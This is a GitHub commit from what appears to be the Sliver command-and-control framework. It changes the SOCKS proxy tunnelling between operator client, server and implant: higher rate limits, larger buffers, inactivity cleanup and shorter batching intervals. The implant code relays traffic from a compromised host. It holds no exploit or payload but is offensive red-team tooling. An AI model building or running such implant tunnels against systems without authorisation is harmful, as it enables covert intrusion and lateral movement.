Skip to content

Commit

Permalink
Performance Optimizations and Implant SOCKS Changes
Browse files Browse the repository at this point in the history
  • Loading branch information
navsec committed Nov 17, 2024
1 parent c18c193 commit 3eda32f
Show file tree
Hide file tree
Showing 3 changed files with 82 additions and 16 deletions.
4 changes: 2 additions & 2 deletions client/core/socks.go
Original file line number Diff line number Diff line change
Expand Up @@ -211,8 +211,8 @@ const leakyBufSize = 4108 // data.len(2) + hmacsha1(10) + data(4096)
var leakyBuf = leaky.NewLeakyBuf(2048, leakyBufSize)

func connect(conn net.Conn, stream rpcpb.SliverRPC_SocksProxyClient, frame *sliverpb.SocksData) {
// Client Rate Limiter: 5 operations per second, burst of 1
limiter := rate.NewLimiter(rate.Limit(5), 1)
// Client Rate Limiter: 10 operations per second, burst of 1
limiter := rate.NewLimiter(rate.Limit(10), 1)

SocksConnPool.Store(frame.TunnelID, conn)

Expand Down
72 changes: 66 additions & 6 deletions implant/sliver/handlers/tunnel_handlers/socks_handler.go
Original file line number Diff line number Diff line change
Expand Up @@ -36,16 +36,29 @@ import (
"google.golang.org/protobuf/proto"
)

const (
inactivityCheckInterval = 4 * time.Second
inactivityTimeout = 15 * time.Second
)

type socksTunnelPool struct {
tunnels *sync.Map // map[uint64]chan []byte
tunnels *sync.Map // map[uint64]chan []byte
lastActivity *sync.Map // map[uint64]time.Time
}

var socksTunnels = socksTunnelPool{
tunnels: &sync.Map{},
tunnels: &sync.Map{},
lastActivity: &sync.Map{},
}

var socksServer *socks5.Server

// Initialize socks server
func init() {
socksServer = socks5.NewServer()
socksTunnels.startCleanupMonitor()
}

func SocksReqHandler(envelope *sliverpb.Envelope, connection *transports.Connection) {
socksData := &sliverpb.SocksData{}
err := proto.Unmarshal(envelope.Data, socksData)
Expand All @@ -58,6 +71,10 @@ func SocksReqHandler(envelope *sliverpb.Envelope, connection *transports.Connect
if socksData.Data == nil {
return
}

// Record activity as soon as we get data for this tunnel
socksTunnels.recordActivity(socksData.TunnelID)

// {{if .Config.Debug}}
log.Printf("[socks] User to Client to (server to implant) Data Sequence %d, Data Size %d\n", socksData.Sequence, len(socksData.Data))
// {{end}}
Expand All @@ -70,8 +87,6 @@ func SocksReqHandler(envelope *sliverpb.Envelope, connection *transports.Connect
socksServer = socks5.NewServer(
socks5.WithAuthMethods([]socks5.Authenticator{auth}),
)
} else {
socksServer = socks5.NewServer()
}

// {{if .Config.Debug}}
Expand All @@ -80,18 +95,27 @@ func SocksReqHandler(envelope *sliverpb.Envelope, connection *transports.Connect

// init tunnel
if tunnel, ok := socksTunnels.tunnels.Load(socksData.TunnelID); !ok {
tunnelChan := make(chan []byte, 10)
tunnelChan := make(chan []byte, 500)
socksTunnels.tunnels.Store(socksData.TunnelID, tunnelChan)
tunnelChan <- socksData.Data
err := socksServer.ServeConn(&socks{stream: socksData, conn: connection})
if err != nil {
// {{if .Config.Debug}}
log.Printf("[socks] Failed to serve connection: %v", err)
// {{end}}
// Cleanup on serve failure
socksTunnels.tunnels.Delete(socksData.TunnelID)
return
}
} else {
tunnel.(chan []byte) <- socksData.Data
select {
case tunnel.(chan []byte) <- socksData.Data:
// Data sent successfully
default:
// {{if .Config.Debug}}
log.Printf("[socks] Channel full for tunnel %d, dropping data", socksData.TunnelID)
// {{end}}
}
}
}

Expand All @@ -110,11 +134,13 @@ func (s *socks) Read(b []byte) (n int, err error) {
return 0, errors.New("[socks] invalid tunnel id")
}

socksTunnels.recordActivity(s.stream.TunnelID)
data := <-channel.(chan []byte)
return copy(b, data), nil
}

func (s *socks) Write(b []byte) (n int, err error) {
socksTunnels.recordActivity(s.stream.TunnelID)
data, err := proto.Marshal(&sliverpb.SocksData{
TunnelID: s.stream.TunnelID,
Data: b,
Expand Down Expand Up @@ -181,3 +207,37 @@ func (c *socks) SetReadDeadline(t time.Time) error {
func (c *socks) SetWriteDeadline(t time.Time) error {
return nil
}

func (s *socksTunnelPool) recordActivity(tunnelID uint64) {
s.lastActivity.Store(tunnelID, time.Now())
}

func (s *socksTunnelPool) startCleanupMonitor() {
go func() {
ticker := time.NewTicker(inactivityCheckInterval)
defer ticker.Stop()

for range ticker.C {
s.tunnels.Range(func(key, value interface{}) bool {
tunnelID := key.(uint64)
lastActivityI, exists := s.lastActivity.Load(tunnelID)
if !exists {
// If no activity record exists, create one
s.recordActivity(tunnelID)
return true
}

lastActivity := lastActivityI.(time.Time)
if time.Since(lastActivity) > inactivityTimeout {
// Clean up the inactive tunnel
if ch, ok := value.(chan []byte); ok {
close(ch)
}
s.tunnels.Delete(tunnelID)
s.lastActivity.Delete(tunnelID)
}
return true
})
}
}()
}
22 changes: 14 additions & 8 deletions server/rpc/rpc-socks.go
Original file line number Diff line number Diff line change
Expand Up @@ -101,8 +101,10 @@ func (c *socksDataCache) recordActivity(tunnelID uint64) {
const (
writeTimeout = 5 * time.Second
batchSize = 100 // Maximum number of sequences to batch
inactivityCheckInterval = 5 * time.Second
inactivityCheckInterval = 4 * time.Second
inactivityTimeout = 15 * time.Second
ToImplantTickerInterval = 10 * time.Millisecond // data going towards implant is usually smaller request data
ToClientTickerInterval = 5 * time.Millisecond // data coming back from implant is usually larger response data
)

func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {
Expand Down Expand Up @@ -165,7 +167,7 @@ func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {

if tunnel.Client == nil {
tunnel.Client = stream
tunnel.FromImplant = make(chan *sliverpb.SocksData, 100)
tunnel.FromImplant = make(chan *sliverpb.SocksData, 500)

// Monitor tunnel goroutines for inactivity and cleanup
wg.Add(1)
Expand Down Expand Up @@ -203,10 +205,14 @@ func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {
toImplantCacheSocks.mutex.RUnlock()
fromImplantCacheSocks.mutex.RUnlock()

// Clean up goroutine if both directions have hit the idle threshold or if client has disconnected
if time.Since(toLastActivity) > inactivityTimeout &&
time.Since(fromLastActivity) > inactivityTimeout ||
tunnel.Client == nil || session == nil {
// Clean up goroutine if both directions have hit the idle threshold
if time.Since(toLastActivity) > inactivityTimeout && time.Since(fromLastActivity) > inactivityTimeout {
s.CloseSocks(context.Background(), &sliverpb.Socks{TunnelID: tunnelID})
return
}

// Clean up goroutine if the client has disconnected early
if tunnel.Client == nil || session == nil {
s.CloseSocks(context.Background(), &sliverpb.Socks{TunnelID: tunnelID})
return
}
Expand All @@ -228,7 +234,7 @@ func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {
}()

pendingData := make(map[uint64]*sliverpb.SocksData)
ticker := time.NewTicker(50 * time.Millisecond) // 50ms ticker - data coming back from implant is usually larger response data
ticker := time.NewTicker(ToClientTickerInterval)
defer ticker.Stop()

for {
Expand Down Expand Up @@ -307,7 +313,7 @@ func (s *Server) SocksProxy(stream rpcpb.SliverRPC_SocksProxyServer) error {
}()

pendingData := make(map[uint64]*sliverpb.SocksData)
ticker := time.NewTicker(100 * time.Millisecond) // 100ms ticker - data going towards implant is usually smaller request data
ticker := time.NewTicker(ToImplantTickerInterval)
defer ticker.Stop()

for {
Expand Down

0 comments on commit 3eda32f

Please sign in to comment.